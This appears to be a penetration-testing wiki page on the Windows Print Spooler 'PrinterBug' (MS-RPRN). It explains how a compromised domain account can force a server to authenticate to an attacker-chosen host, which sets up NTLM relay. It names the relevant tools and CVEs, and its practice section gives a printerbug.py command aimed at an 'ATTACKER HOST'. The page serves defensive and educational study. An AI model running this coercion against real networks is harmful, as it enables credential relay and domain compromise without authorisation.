MS-RPRN abuse (PrinterBug)

Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments (more info on the finding).

The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.

The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.

The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \pipe\spoolss named pipe through the IPC$ share.

Practice

Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).

The spooler service can be triggered with printerbug or SpoolSample (C#). There are many alternatives available publicly on the Internet.

Trigger the spooler service

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of NTLM relay. For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.

Resources

https://blog.harmj0y.net/redteaming/not-a-security-boundary-breaking-forest-trusts/